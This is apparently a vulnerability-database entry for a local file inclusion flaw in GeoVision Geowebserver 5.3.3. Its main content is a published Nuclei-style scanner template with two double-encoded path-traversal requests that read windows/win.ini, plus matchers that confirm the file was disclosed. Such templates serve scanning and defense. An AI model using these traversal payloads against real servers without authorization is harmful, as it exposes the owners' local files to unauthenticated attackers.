geowebserver-lfi: GeoVision Geowebserver 5.3.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: GeoVision Geowebserver | POC: 已公开

漏洞描述

GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.

PoC代码[已公开]

id: geowebserver-lfi

info:
  name: GeoVision Geowebserver 5.3.3 - Local File Inclusion
  author: madrobot
  severity: high
  description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: packetstorm,geowebserver,lfi,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
      - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
        part: body

      - type: status
        status:
          - 200
# digest: 490a00463044022039d57e83ca3aca98b077fe61ecc3e27d02b25e496c9fbca53cb9cec1053f63e502203a106940b52584a7b8ef795c290a942cdf373cd1ecc6efe941a366f192902157:922c64590222798bb761d5b6d8e72950

相关漏洞推荐